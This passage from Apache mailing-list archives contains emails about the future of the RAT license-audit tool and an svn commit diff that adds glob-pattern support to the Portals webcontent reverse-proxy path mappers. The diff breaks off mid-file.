relay2.mail.ox.ac.uk with esmtp (Exim 4.71) (envelope-from <[email protected]>) id 1OlMYJ-0002cS-8l for [email protected]; Tue, 17 Aug 2010 14:50:07 +0100 Received: from oucs-sander2.oucs.ox.ac.uk ([161.129.204.104]) by smtp1.mail.ox.ac.uk with esmtpsa (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1OlMYJ-0003CK-4z for [email protected]; Tue, 17 Aug 2010 14:50:07 +0100 Message-ID: <[email protected]> Date: Tue, 17 Aug 2010 14:50:11 +0100 From: Ross Gardler <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:161.129.204.104) Gecko/20100711 Thunderbird/3.0.6 MIME-Version: 1.0 To: [email protected] Subject: Re: Part 2: Future of RAT References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Oxford-Username: oucs0040 X-Virus-Checked: Checked by ClamAV on apache.org On 17/08/2010 14:42, Hyrum K. Wright wrote: > On Tue, Aug 17, 2010 at 2:55 AM, Ross Gardler<[email protected]> wrote: >> Something where I could say "are we overlooking a potential committer" or "do any committers appear to have gone emeritus without telling us". > > You may be interested in something we've used with Subversion for > several years: the contribulyzer. It looks at log messages (which > must have a special syntax), and creates a list which easily > recognizes the various patches people have contributed, or even ideas > or bugs they have found. The current output is here: > http://www.red-bean.com/svnproject/contribulyzer/ Cool (and a cool name too) Ross From [email protected] Tue Aug 17 15:37:43 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33801 invoked from network); 17 Aug 2010 15:37:43 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 15:37:43 -0000 Received: (qmail 12157 invoked by uid 500); 17 Aug 2010 15:37:43 -0000 Delivered-To: [email protected] Received: (qmail 12105 invoked by uid 500); 17 Aug 2010 15:37:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12097 invoked by uid 99); 17 Aug 2010 15:37:43 -0000 Received: from Unknown (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 15:37:43 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 15:37:20 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id CB0B440E000A for <[email protected]>; Tue, 17 Aug 2010 17:36:59 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id eUtBqRsgvQEI for <[email protected]>; Tue, 17 Aug 2010 17:36:59 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id 3E58A40E0009; Tue, 17 Aug 2010 17:36:57 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: Part 2: Future of RAT References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1075) Date: Tue, 17 Aug 2010 17:36:57 +0200 In-Reply-To: <[email protected]> (Ross Gardler's message of "Tue, 17 Aug 2010 12:46:15 +0100") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org On 2010-08-17, Ross Gardler wrote: > So for now I'd rather keep the question simple: > "Is it done?" For all I wanted RAT to do, it is. That doesn't mean I wouldn't be around to help or even contribute as time permits if people want to implement the full scope of the proposal, I just lack the time and desire to drive it. Stefan From [email protected] Tue Aug 17 15:43:38 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35143 invoked from network); 17 Aug 2010 15:43:38 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Aug 2010 15:43:38 -0000 Received: (qmail 18836 invoked by uid 500); 17 Aug 2010 15:43:38 -0000 Delivered-To: [email protected] Received: (qmail 18783 invoked by uid 500); 17 Aug 2010 15:43:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18774 invoked by uid 99); 17 Aug 2010 15:43:37 -0000 Received: from Unknown (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 15:43:37 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 17 Aug 2010 15:43:15 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id 5967140E000A for <[email protected]>; Tue, 17 Aug 2010 17:42:54 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by localhost (v35516.1blu.de [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id ryIEXPFLN9Xs for <[email protected]>; Tue, 17 Aug 2010 17:42:53 +0200 (CEST) Received: by samaflost.de (Postfix, from userid 1000) id ED3CA40E0009; Tue, 17 Aug 2010 17:42:53 +0200 (CEST) From: Stefan Bodewig <[email protected]> To: [email protected] Subject: Re: Part 2: Future of RAT References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Draft-From: ("nnfolder:mail.rat" 1077) Date: Tue, 17 Aug 2010 17:42:53 +0200 In-Reply-To: <[email protected]> (Ross Gardler's message of "Tue, 17 Aug 2010 13:23:44 +0100") Message-ID: <[email protected]> User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/23.2 (gnu/linux) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org On 2010-08-17, Ross Gardler wrote: > The design of RAT makes it quite easy to do the very first of these > (check for other headers and compare against a compatibility table), > but even though I want it I've never found the time to do it. It can already do that - well the Antlib can, so the core of RAT is capable of doing it. Just take a look at the javasources-w3c target in ant-task-examples.xml, this will generate a report on RAT's source tree where the "compatibility table" only contains the W3C license - flagging all Apache licensed files as unknown. For your usecase you'd add matchers for your compatibility table and all files with a different license would fall out. Stefan
From [email protected] Thu Oct 01 17:57:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88913 invoked from network); 1 Oct 2009 17:57:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Oct 2009 17:57:20 -0000 Received: (qmail 34423 invoked by uid 500); 1 Oct 2009 17:57:20 -0000 Delivered-To: [email protected] Received: (qmail 34394 invoked by uid 500); 1 Oct 2009 17:57:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 34384 invoked by uid 99); 1 Oct 2009 17:57:20 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Oct 2009 17:57:20 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Oct 2009 17:57:07 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id B1C9B23888D4; Thu, 1 Oct 2009 17:56:44 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r820733 - in /portals/applications/webcontent/trunk: webcontent-jar/ webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/ webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/ webconte... Date: Thu, 01 Oct 2009 17:56:44 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: woonsan Date: Thu Oct 1 17:56:43 2009 New Revision: 820733 URL: http://svn.apache.org/viewvc?rev=820733&view=rev Log: APA-17: Allowing glob expressions in pass mapping configurations. Added: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java (with props) portals/applications/webcontent/trunk/webcontent-jar/src/test/resources/ portals/applications/webcontent/trunk/webcontent-jar/src/test/resources/log4j.properties (contents, props changed) - copied, changed from r820182, portals/applications/webcontent/trunk/webcontent-jar/src/test/java/log4j.properties Removed: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/log4j.properties Modified: portals/applications/webcontent/trunk/webcontent-jar/pom.xml portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/PassMappingLinkRewritingParserAaptor.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/SimpleLinkRewritingParserAaptor.java portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/portlet.xml Modified: portals/applications/webcontent/trunk/webcontent-jar/pom.xml URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/pom.xml?rev=820733&r1=820732&r2=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/pom.xml (original) +++ portals/applications/webcontent/trunk/webcontent-jar/pom.xml Thu Oct 1 17:56:43 2009 @@ -45,6 +45,7 @@ <commons-httpclient.version>3.0.1</commons-httpclient.version> <commons-beanutils.version>1.8.0</commons-beanutils.version> <commons-configuration.version>1.6</commons-configuration.version> + <easymock.version>2.5.2</easymock.version> </properties> <!-- Dependencies --> @@ -197,7 +198,12 @@ </exclusion> </exclusions> </dependency> - + <dependency> + <groupId>org.easymock</groupId> + <artifactId>easymock</artifactId> + <version>${easymock.version}</version> + <scope>test</scope> + </dependency> </dependencies> <build> <plugins> Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java?rev=820733&r1=820732&r2=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapper.java Thu Oct 1 17:56:43 2009 @@ -16,27 +16,52 @@ */ package org.apache.portals.applications.webcontent.proxy; + /** * proxy path mapper interface for http reverse proxy service. * * @version $Id$ */ -public interface HttpReverseProxyPathMapper +public interface HttpReverseProxyPathMapper extends Cloneable { /** + * Returns the name + * @return + */ + public String getName(); + + /** + * Sets the name + * @return + */ + public void setName(String name); + + /** * Returns the local base path to be mapped to remote base url. * @return */ public String getLocalBasePath(); /** + * Sets the local base path to be mapped to remote base url. + * @return + */ + public void setLocalBasePath(String localBasePath); + + /** * Returns the remote base url mapped by the local path. * @return */ public String getRemoteBaseURL(); /** + * Sets the remote base url mapped by the local path. + * @return + */ + public void setRemoteBaseURL(String removeBaseURL); + + /** * Generates a remote url mapped by the path. * <P>It returns a translated remote URL or null if the translation fails.</P> * @param localPath @@ -52,4 +77,10 @@ */ public String getLocalPath(String remoteURL); + /** + * Clone object + * @return + */ + public Object clone(); + } \ No newline at end of file Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java?rev=820733&r1=820732&r2=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/HttpReverseProxyPathMapperProvider.java Thu Oct 1 17:56:43 2009 @@ -44,16 +44,16 @@ public HttpReverseProxyPathMapper findMapperByRemoteURL(String remoteURL); /** - * Finds a reverse proxy rewriter controller based on the request + * Gets a reverse proxy rewriter controller corresponded to proxy path mapper * @return */ - public RewriterController findRewriterController(HttpServletRequest request); + public RewriterController getRewriterController(HttpReverseProxyPathMapper proxyPathMapper); /** - * Finds a reverse proxy rewriter rules based on the request + * Gets a reverse proxy rewriter rules corresponded to proxy path mapper * @return */ - public Ruleset findRewriterRuleset(HttpServletRequest request); + public Ruleset getRewriterRuleset(HttpReverseProxyPathMapper proxyPathMapper); /** * Returns unmodifiable proxy path mappers. Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java?rev=820733&r1=820732&r2=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperImpl.java Thu Oct 1 17:56:43 2009 @@ -26,25 +26,56 @@ */ public class DefaultHttpReverseProxyPathMapperImpl implements HttpReverseProxyPathMapper { + private String name; private String localBasePath; private String remoteBaseURL; - public DefaultHttpReverseProxyPathMapperImpl(String localBasePath, String remoteBaseURL) + private int hash; + + public DefaultHttpReverseProxyPathMapperImpl() { + } + + public DefaultHttpReverseProxyPathMapperImpl(String name, String localBasePath, String remoteBaseURL) + { + this.name = name; this.localBasePath = localBasePath; this.remoteBaseURL = remoteBaseURL; } + public String getName() + { + return name; + } + + public void setName(String name) + { + this.name = name; + this.hash = 0; + } + public String getLocalBasePath() { return localBasePath; } - + + public void setLocalBasePath(String localBasePath) + { + this.localBasePath = localBasePath; + this.hash = 0; + } + public String getRemoteBaseURL() { return remoteBaseURL; } - + + public void setRemoteBaseURL(String remoteBaseURL) + { + this.remoteBaseURL = remoteBaseURL; + this.hash = 0; + } + public String getRemoteURL(String localPath) { if (StringUtils.startsWith(localPath, localBasePath)) @@ -65,4 +96,43 @@ return null; } + @Override + public Object clone() + { + DefaultHttpReverseProxyPathMapperImpl cloned = new DefaultHttpReverseProxyPathMapperImpl(); + cloned.name = name; + cloned.localBasePath = localBasePath; + cloned.remoteBaseURL = remoteBaseURL; + return cloned; + } + + @Override + public int hashCode() + { + if (hash == 0) + { + hash = new StringBuilder(40).append(name).append(':').append(localBasePath).append(':').append(remoteBaseURL).toString().hashCode(); + } + + return hash; + } + + @Override + public boolean equals(Object o) + { + if (hash != o.hashCode()) + { + return false; + } + + if (o instanceof HttpReverseProxyPathMapper) + { + HttpReverseProxyPathMapper mapper = (HttpReverseProxyPathMapper) o; + return (StringUtils.equals(name, mapper.getName()) && + StringUtils.equals(localBasePath, mapper.getLocalBasePath()) && + StringUtils.equals(remoteBaseURL, mapper.getRemoteBaseURL())); + } + + return false; + } } Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java?rev=820733&r1=820732&r2=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyPathMapperProviderImpl.java Thu Oct 1 17:56:43 2009 @@ -16,17 +16,23 @@ */ package org.apache.portals.applications.webcontent.proxy.impl; +import java.util.ArrayList; import java.util.Collections; +import java.util.HashMap; import java.util.List; +import java.util.Map; +import java.util.regex.Matcher; +import java.util.regex.Pattern; import javax.servlet.http.HttpServletRequest; -import org.apache.commons.collections.KeyValue; import org.apache.commons.lang.StringUtils; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapper; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapperProvider; import org.apache.portals.applications.webcontent.rewriter.RewriterController; import org.apache.portals.applications.webcontent.rewriter.rules.Ruleset; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; /** * Default <CODE>HttpReverseProxyPathMapperProvider</CODE> implementation @@ -36,90 +42,285 @@ public class DefaultHttpReverseProxyPathMapperProviderImpl implements HttpReverseProxyPathMapperProvider { + private static String [] GLOB_EXPR_SEARCHES = { "*", ".", "/", "?", "+" }; + + private static String [] GLOB_EXPR_REPLACES = { "(.+)", "\\.", "\\/", "\\?", "\\+" }; + + private static String [] GROUP_REF_SEARCHES = { "$1", "$2", "$3", "$4", "$5", "$6", "$7", "$8", "$9" }; + + private static String [] GROUP_REF_REPLACES = { "(.+)", "(.+)", "(.+)", "(.+)", "(.+)", "(.+)", "(.+)", "(.+)", "(.+)" }; + + private static Logger log = LoggerFactory.getLogger(DefaultHttpReverseProxyPathMapperProviderImpl.class); + /** * Proxy path mappers */ private List<HttpReverseProxyPathMapper> proxyPathMappers; /** + * Proxy path Glob mappers + */ + private List<HttpReverseProxyPathMapper> proxyPathGlobMappers; + + /** * rewriter controller mappers */ - private List<KeyValue> rewriterControllerPairs; + private Map<HttpReverseProxyPathMapper, RewriterController> rewriterControllerMap; /** * rewriter rulesets */ - private List<KeyValue> rewriterRulesetPairs; + private Map<HttpReverseProxyPathMapper, Ruleset> rewriterRulesetMap; + + private Map<HttpReverseProxyPathMapper, Pattern> localBasePathGlobPatternMap; + + private Map<HttpReverseProxyPathMapper, Pattern> remoteBaseURLGlobPatternMap; public DefaultHttpReverseProxyPathMapperProviderImpl(List<HttpReverseProxyPathMapper> proxyPathMappers, - List<KeyValue> rewriterControllerPairs, - List<KeyValue> rewriterRulesetPairs) + Map<HttpReverseProxyPathMapper, RewriterController> rewriterControllerMap, + Map<HttpReverseProxyPathMapper, Ruleset> rewriterRulesetMap) { - this.proxyPathMappers = proxyPathMappers; - this.rewriterControllerPairs = rewriterControllerPairs; - this.rewriterRulesetPairs = rewriterRulesetPairs; + this.rewriterControllerMap = rewriterControllerMap; + this.rewriterRulesetMap = rewriterRulesetMap; + + this.proxyPathMappers = Collections.synchronizedList(new ArrayList<HttpReverseProxyPathMapper>()); + this.proxyPathGlobMappers = new ArrayList<HttpReverseProxyPathMapper>(); + + for (HttpReverseProxyPathMapper proxyPathMapper : proxyPathMappers) + { + if (!StringUtils.contains(proxyPathMapper.getLocalBasePath(), '*')) + { + this.proxyPathMappers.add(proxyPathMapper); + } + else + { + this.proxyPathGlobMappers.add(proxyPathMapper); + } + } + + this.localBasePathGlobPatternMap = Collections.synchronizedMap(new HashMap<HttpReverseProxyPathMapper, Pattern>()); + this.remoteBaseURLGlobPatternMap = Collections.synchronizedMap(new HashMap<HttpReverseProxyPathMapper, Pattern>()); } public HttpReverseProxyPathMapper findMapper(HttpServletRequest request) { + HttpReverseProxyPathMapper mapper = null; String pathInfo = request.getPathInfo(); - for (HttpReverseProxyPathMapper proxyPathMapper : proxyPathMappers) + int mapperCount = proxyPathMappers.size(); + + for (int i = 0; i < mapperCount; i++) { + HttpReverseProxyPathMapper proxyPathMapper = proxyPathMappers.get(i); + if (StringUtils.startsWith(pathInfo, proxyPathMapper.getLocalBasePath())) { return proxyPathMapper; } } - return null; - } - - public HttpReverseProxyPathMapper findMapperByRemoteURL(String remoteURL) - { - if (remoteURL != null) + if (!proxyPathGlobMappers.isEmpty()) { - for (HttpReverseProxyPathMapper proxyPathMapper : proxyPathMappers) + for (HttpReverseProxyPathMapper proxyPathMapper : proxyPathGlobMappers) { - if (StringUtils.startsWith(remoteURL, proxyPathMapper.getRemoteBaseURL())) + Pattern pattern = localBasePathGlobPatternMap.get(proxyPathMapper); + + if (pattern == null) { - return proxyPathMapper; + try + { + pattern = Pattern.compile(StringUtils.replaceEach(proxyPathMapper.getLocalBasePath(), GLOB_EXPR_SEARCHES, GLOB_EXPR_REPLACES)); + } + catch (Exception e) + { + if (log.isDebugEnabled()) + { + log.error("Failed to create regular expression pattern. Blacklisted: " + proxyPathMapper.getLocalBasePath(), e); + } + else + { + log.error("Failed to create regular expression pattern. Blacklisted: {}. {}", proxyPathMapper.getLocalBasePath(), e); + } + } + + if (pattern != null) + { + localBasePathGlobPatternMap.put(proxyPathMapper, pattern); + } + } + + if (pattern != null) + { + Matcher matcher = pattern.matcher(pathInfo); + + if (matcher.lookingAt()) + { + int groupCount = matcher.groupCount(); + String [] replaces = new String[groupCount]; + String [] searches = new String[groupCount]; + + for (int i = 0; i < groupCount; i++) + { + replaces[i] = matcher.group(i + 1); + searches[i] = "$" + (i + 1); + } + + HttpReverseProxyPathMapper cloned = (HttpReverseProxyPathMapper) proxyPathMapper.clone(); + String localBasePath = matcher.group(0); + cloned.setName(proxyPathMapper.getName() + ":" + localBasePath); + cloned.setLocalBasePath(localBasePath); + cloned.setRemoteBaseURL(StringUtils.replaceEach(proxyPathMapper.getRemoteBaseURL(), searches, replaces)); + + RewriterController rewriterController = rewriterControllerMap.get(proxyPathMapper); + Ruleset rewriterRules = rewriterRulesetMap.get(proxyPathMapper); + + if (rewriterController != null) + { + rewriterControllerMap.put(cloned, rewriterController); + } + + if (rewriterRules != null) + { + rewriterRulesetMap.put(cloned, rewriterRules); + } + + synchronized (proxyPathMappers) + { + if (!proxyPathMappers.contains(cloned)) + { + proxyPathMappers.add(cloned); + } + } + + return cloned; + } } } } return null; } - - public RewriterController findRewriterController(HttpServletRequest request) + + public HttpReverseProxyPathMapper findMapperByRemoteURL(String remoteURL) { - String pathInfo = request.getPathInfo(); + if (remoteURL == null) + { + return null; + } + + int mapperCount = proxyPathMappers.size(); - for (KeyValue pair : rewriterControllerPairs) + for (int i = 0; i < mapperCount; i++) { - if (StringUtils.startsWith(pathInfo, (String) pair.getKey())) + HttpReverseProxyPathMapper proxyPathMapper = proxyPathMappers.get(i); + + if (StringUtils.startsWith(remoteURL, proxyPathMapper.getRemoteBaseURL())) { - return (RewriterController) pair.getValue(); + return proxyPathMapper; } } - return null; - } - - public Ruleset findRewriterRuleset(HttpServletRequest request) - { - String pathInfo = request.getPathInfo(); - - for (KeyValue pair : rewriterRulesetPairs) + if (!proxyPathGlobMappers.isEmpty()) { - if (StringUtils.startsWith(pathInfo, (String) pair.getKey())) + for (HttpReverseProxyPathMapper proxyPathMapper : proxyPathGlobMappers) { - return (Ruleset) pair.getValue(); + Pattern pattern = remoteBaseURLGlobPatternMap.get(proxyPathMapper); + + if (pattern == null) + { + try + { + String expr = StringUtils.replaceEach(proxyPathMapper.getRemoteBaseURL(), GLOB_EXPR_SEARCHES, GLOB_EXPR_REPLACES); + expr = StringUtils.replaceEach(expr, GROUP_REF_SEARCHES, GROUP_REF_REPLACES); + pattern = Pattern.compile(expr); + } + catch (Exception e) + { + if (log.isDebugEnabled()) + { + log.error("Failed to create regular expression pattern: " + proxyPathMapper.getRemoteBaseURL(), e); + } + else + { + log.error("Failed to create regular expression pattern: {}. {}", proxyPathMapper.getRemoteBaseURL(), e); + } + } + + if (pattern != null) + { + remoteBaseURLGlobPatternMap.put(proxyPathMapper, pattern); + } + } + + if (pattern != null) + { + Matcher matcher = pattern.matcher(remoteURL); + + if (matcher.lookingAt()) + { + int groupCount = matcher.groupCount(); + String [] replaces = new String[groupCount]; + String [] searches = new String[groupCount]; + + for (int i = 0; i < groupCount; i++) + { + replaces[i] = matcher.group(i + 1); + searches[i] = "$" + (i + 1); + } + + HttpReverseProxyPathMapper cloned = (HttpReverseProxyPathMapper) proxyPathMapper.clone(); + String remoteBaseURL = matcher.group(0); + cloned.setRemoteBaseURL(remoteBaseURL); + String localBasePath = proxyPathMapper.getLocalBasePath(); + + for (int i = 1; StringUtils.contains(localBasePath, '*'); i++) + { + localBasePath = StringUtils.replaceOnce(localBasePath, "*", "$" + i); + } + + localBasePath = StringUtils.replaceEach(localBasePath, searches, replaces); + cloned.setName(proxyPathMapper.getName() + ":" + localBasePath); + cloned.setLocalBasePath(localBasePath); + + RewriterController rewriterController = rewriterControllerMap.get(proxyPathMapper); + Ruleset rewriterRules = rewriterRulesetMap.get(proxyPathMapper); + + if (rewriterController != null) + { + rewriterControllerMap.put(cloned, rewriterController); + } + + if (rewriterRules != null) + { + rewriterRulesetMap.put(cloned, rewriterRules); + } + + synchronized (proxyPathMappers) + { + if (!proxyPathMappers.contains(cloned)) + { + proxyPathMappers.add(cloned); + } + } + + return cloned; + } + } } } return null; } + + public RewriterController getRewriterController(HttpReverseProxyPathMapper proxyPathMapper) + { + return rewriterControllerMap.get(proxyPathMapper); + } + + public Ruleset getRewriterRuleset(HttpReverseProxyPathMapper proxyPathMapper) + { + return rewriterRulesetMap.get(proxyPathMapper); + } public List<HttpReverseProxyPathMapper> getProxyPathMappers() { Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java?rev=820733&r1=820732&r2=820733&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java Thu Oct 1 17:56:43 2009 @@ -34,8 +34,6 @@ import javax.servlet.http.HttpServletResponse; import org.apache.commons.beanutils.BeanUtils; -import org.apache.commons.collections.KeyValue; -import org.apache.commons.collections.keyvalue.DefaultKeyValue; import org.apache.commons.configuration.Configuration; import org.apache.commons.configuration.PropertiesConfiguration; import org.apache.commons.configuration.reloading.FileChangedReloadingStrategy; @@ -133,22 +131,24 @@ List<HttpReverseProxyPathMapper> proxyPathMappers = new ArrayList<HttpReverseProxyPathMapper>(); - List<KeyValue> rewriterControllerPairs = new ArrayList<KeyValue>(); - List<KeyValue> rewriterRulesetPairs = new ArrayList<KeyValue>(); + Map<HttpReverseProxyPathMapper, RewriterController> rewriterControllerMap = new HashMap<HttpReverseProxyPathMapper, RewriterController>(); + Map<HttpReverseProxyPathMapper, Ruleset> rewriterRulesetMap = new HashMap<HttpReverseProxyPathMapper, Ruleset>(); Configuration passConf = configuration.subset("proxy.reverse.pass"); String [] pathNames = passConf.getStringArray(""); - try + for (String pathName : pathNames) { - for (String pathName : pathNames) + Configuration pathPassConf = passConf.subset(pathName); + + String localBasePath = pathPassConf.getString("local"); + String remoteBaseURL = pathPassConf.getString("remote"); + + try { - Configuration pathPassConf = passConf.subset(pathName); - - String localBasePath = pathPassConf.getString("local"); - String remoteBaseURL = pathPassConf.getString("remote"); - - proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl(localBasePath, remoteBaseURL)); + HttpReverseProxyPathMapper 